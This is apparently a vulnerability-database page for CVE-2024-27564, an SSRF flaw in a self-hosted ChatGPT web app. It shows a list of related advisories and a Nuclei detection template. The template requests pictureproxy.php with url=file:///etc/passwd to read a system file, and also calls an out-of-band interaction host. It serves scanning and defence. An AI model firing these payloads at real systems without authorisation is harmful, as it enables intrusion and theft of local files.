| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2024-27564 | 5 Mar 202418:27 | – | circl | |
| ChatGPT Code Issue Vulnerability | 5 Mar 202400:00 | – | cnnvd | |
| CVE-2024-27564 | 5 Mar 202400:00 | – | cve | |
| CVE-2024-27564 | 5 Mar 202400:00 | – | cvelist | |
| Exploit for Server-Side Request Forgery in Dirk1983 Chatgpt | 15 Sep 202415:11 | – | githubexploit | |
| Hackers Exploit ChatGPT with CVE-2024-27564, 10,000+ Attacks in a Week | 17 Mar 202521:26 | – | hackread | |
| 7 Steps for Securing Generative AI in Enterprises | 15 Nov 202522:11 | – | hivepro | |
| CVE-2024-27564 | 5 Mar 202417:15 | – | nvd | |
| CVE-2024-27564 | 5 Mar 202417:15 | – | osv | |
| Server side request forgery (ssrf) | 5 Mar 202417:15 | – | prion |
id: CVE-2024-27564
info:
name: ChatGPT个人专用版 - Server Side Request Forgery
author: DhiyaneshDK
severity: high
description: |
A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.
impact: |
Attackers can force the application to make arbitrary requests including reading local files and accessing internal resources via SSRF in the pictureproxy.php file.
remediation: |
Update ChatGPT个人专用版 to a version that addresses CVE-2024-27564.
reference:
- https://github.com/dirk1983/chatgpt/issues/114
- https://nvd.nist.gov/vuln/detail/CVE-2024-27564
classification:
epss-score: 0.40637
epss-percentile: 0.98477
cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: chanzhaoyu
product: chatgpt_web
fofa-query: "title=\"ChatGPT个人专用版\""
tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi,vkev,vuln,ai
http:
- method: GET
path:
- "{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd"
- "{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(header, "image/jpeg")
- regex('root:.*:0:0:', body)
condition: and
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- contains(header, "image/jpeg")
- status_code == 200
condition: and
# digest: 4a0a00473045022100eb0e7ad0f6e18ea5f8e3e462e940a4c3a4d946290f689c17e00283e7dbfe245902204d1d59fb940d42675019db44f0fe4ab5dc5b798a6ebc7b32d4ca203dd7f534e2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation